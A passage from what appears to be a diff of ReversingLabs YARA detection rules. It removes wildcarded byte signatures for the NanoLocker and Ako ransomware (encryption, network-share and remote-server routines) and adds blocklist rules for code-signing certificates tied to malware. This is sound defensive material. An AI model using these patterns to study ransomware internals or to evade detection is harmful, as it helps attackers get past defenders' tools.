51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 0F 85 40 03 00 00 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51 - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B B4 05 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 50 8B 85 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 FF 56 ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BB ?? - ?? ?? ?? 8D 4D ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 83 7D ?? ?? 8D 4D ?? 8B F0 - 0F 43 4D ?? 51 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B 06 52 8B 48 ?? 03 CE 8B 01 FF 50 ?? - C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 0D 8B 01 6A ?? 8B 40 ?? 03 C8 8B 01 FF 10 33 F6 C6 45 ?? ?? 56 6A ?? 8D 4D ?? E8 - ?? ?? ?? ?? 83 EC ?? 8B CC 53 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? - } - $ol_ecies_key_2 = { - 56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 53 - E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 - ?? ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? - 56 E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8 - ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 - E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 33 F6 C6 45 ?? ?? 56 50 8D 4D ?? E8 ?? ?? - ?? ?? 56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B CC 89 65 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 53 E8 ?? - ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? - 56 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - } - $ol_ecies_key_3 = { - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB 30 83 EC ?? 8D 55 ?? 8B CC 89 65 ?? E8 - ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC BB ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 51 8D 4F ?? - E8 ?? ?? ?? ?? 8D 77 ?? C7 07 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 53 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 46 ?? C6 45 ?? ?? 85 C0 74 05 8D 4E ?? EB 02 33 C9 8D 55 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? 8B 06 8B CE FF 50 ?? 6A ?? 68 ?? ?? ?? ?? 8B 08 8B 49 ?? 03 C8 8B 01 FF 50 ?? 53 E8 ?? ?? ?? ?? 59 6A ?? - 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 64 89 0D ?? ?? ?? ?? 5B - 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Song WU" and pe.signatures[i].serial=="35:96:df:c2:3b:9a:42:c6:67:00:98:22:50:da:29:06" and 1397219344<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_486Bbddc8C5Ee99F051Ecaeb3F99D2A3 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "07b43dd7-e8f1-5b14-a0f4-42294b5b597e" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17016-L17032" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "75855e26ba4e01b56a551a006e789c6032cfb02c6f6125a9bdf8becb848db5b2" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and (($ol_do_filetypes_1 and $ol_do_filetypes_2 and $ol_do_filetypes_3) and ($ol_ecies_key_1 and $ol_ecies_key_2 and $ol_ecies_key_3)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="48:6b:bd:dc:8c:5e:e9:9f:05:1e:ca:eb:3f:99:d2:a3" and 1473292800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Nanolocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_11211Eea9D0D1D1A325B5Eae1B2B1951120F : INFO FILE { meta: - description = "Yara rule that detects NanoLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a31dad2e-2738-527b-a6e9-322757e2ec30" - date = "2020-07-15" - modified = "2020-07-15" + id = "09b8b3f3-a4aa-5584-b8d0-751cc87267bf" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.NanoLocker.yara#L1-L79" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7fdb021f22d97bf8a00fd856ef913695a0d6fbaad1138b5a5cc2cc8768b130be" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17034-L17050" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bafab986605be61d25a6764042937bc5d8c55196ea8ea9aa9360764d9681351b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "NanoLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_file_1 = { - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 - ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 05 ?? ?? ?? ?? ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 - 05 ?? ?? ?? ?? ?? 8D 3D ?? ?? ?? ?? 33 C9 C6 07 ?? 47 41 81 F9 ?? ?? ?? ?? 75 ?? C7 - 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A - ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A - ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? - ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 81 3D - ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8 - ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 F0 46 8A 06 3C ?? 0F 85 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 - } - $encrypt_file_2 = { - A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 - ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 81 3D ?? ?? ?? ?? - ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? - E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? - ?? ?? ?? 2D ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? A3 ?? - ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? - ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? - ?? ?? ?? E8 - } - $remote_server_1 = { - E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? - ?? ?? 83 F8 ?? 72 ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF - 35 ?? ?? ?? ?? E8 - } - $remote_server_2 = { - E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 68 ?? - ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 - } - $enum_shares_and_encrypt_files = { - E8 ?? ?? ?? ?? C1 C8 ?? BA ?? ?? ?? ?? 23 D0 60 83 FA ?? 75 ?? 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? 8D 35 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 56 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 61 8A 06 46 0A C0 75 ?? 8A 06 0A C0 75 ?? 61 D1 C8 8A 1D ?? - ?? ?? ?? FE C3 88 1D ?? ?? ?? ?? 80 FB ?? 76 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? - ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 - } - condition: - uint16(0)==0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $remote_server_1 and $remote_server_2 and $enum_shares_and_encrypt_files + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LLC HERMES" and pe.signatures[i].serial=="11:21:1e:ea:9d:0d:1d:1a:32:5b:5e:ae:1b:2b:19:51:12:0f" and 1460147212<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_172Fea8Cb06Ffced6Bfac7F2F6B77754 : INFO FILE { meta: - description = "Yara rule that detects Ako ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fce98a6a-f7bd-52ee-a2b8-31b48f6134ca" - date = "2020-07-15" - modified = "2020-07-15" + id = "0890bf55-ebd5-5b68-8047-14692a5f1ae7" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Ako.yara#L1-L173" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8321a4ace66ae48e3a6896daf02c184fa7767fa6bd10cd83b322ad01698008cf" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17052-L17068" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8e1e3e7d002ce084600c5444dc9b0bad8771370cb7919a3bb5ebc899040e4cf2" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ako" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_win64_p1 = { - 44 89 4C 24 ?? 4C 89 44 24 ?? 48 89 54 24 ?? 48 89 4C 24 ?? 56 57 48 81 EC ?? ?? ?? - ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? - 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 83 BC 24 ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? - ?? 41 B9 ?? ?? ?? ?? 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 90 89 44 24 ?? 81 7C 24 ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 84 24 - ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA - 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? 32 - C0 E9 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 - ?? 45 33 C0 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33 C0 BA ?? ?? ?? ?? - 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 - 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? - 48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 C7 44 24 ?? ?? ?? ?? - ?? EB ?? 48 8B 44 24 ?? 48 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 - 39 44 24 ?? 0F 8D ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? - 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D - 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 33 D2 48 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 - B8 ?? ?? ?? ?? 48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 - } - $encrypt_files_win64_p2 = { - 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 45 33 C9 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 - 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ?? - ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? 05 ?? ?? - ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 39 44 24 ?? 0F 83 ?? ?? ?? ?? 48 8D 8C 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 48 03 C1 48 89 44 24 ?? 33 D2 48 8D 8C 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B F8 48 8B 44 24 ?? 48 8B F0 B9 ?? ?? ?? ?? F3 A4 48 - 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? - ?? 4C 8B C8 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 90 0F B6 C0 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 - 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B 44 24 ?? - 48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48 - 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F - B6 44 24 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? E9 ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA - } - $encrypt_files_win64_p3 = { - 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B - F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 41 B9 ?? ?? ?? - ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48 8B C8 E8 - ?? ?? ?? ?? 90 48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90 - 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 24 ?? 44 8B C1 48 8B D0 48 8B 8C - 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 48 89 44 24 - ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 3B C8 0F - 85 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? - C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B - 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 41 - B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 - 85 C0 74 ?? 8B 44 24 ?? 48 83 F8 ?? 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? C6 44 - 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 90 0F B6 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4 - ?? ?? ?? ?? 5F 5E C3 - } - $encrypt_network_shares_win64_p1 = { - 48 89 54 24 ?? 48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B - 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 84 24 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 8B C8 E8 - ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 - 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 - C0 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D - 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C - 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D - 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D - 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D - 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 84 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 - 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D - 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B - } - $encrypt_network_shares_win64_p2 = { - 8C 24 ?? ?? ?? 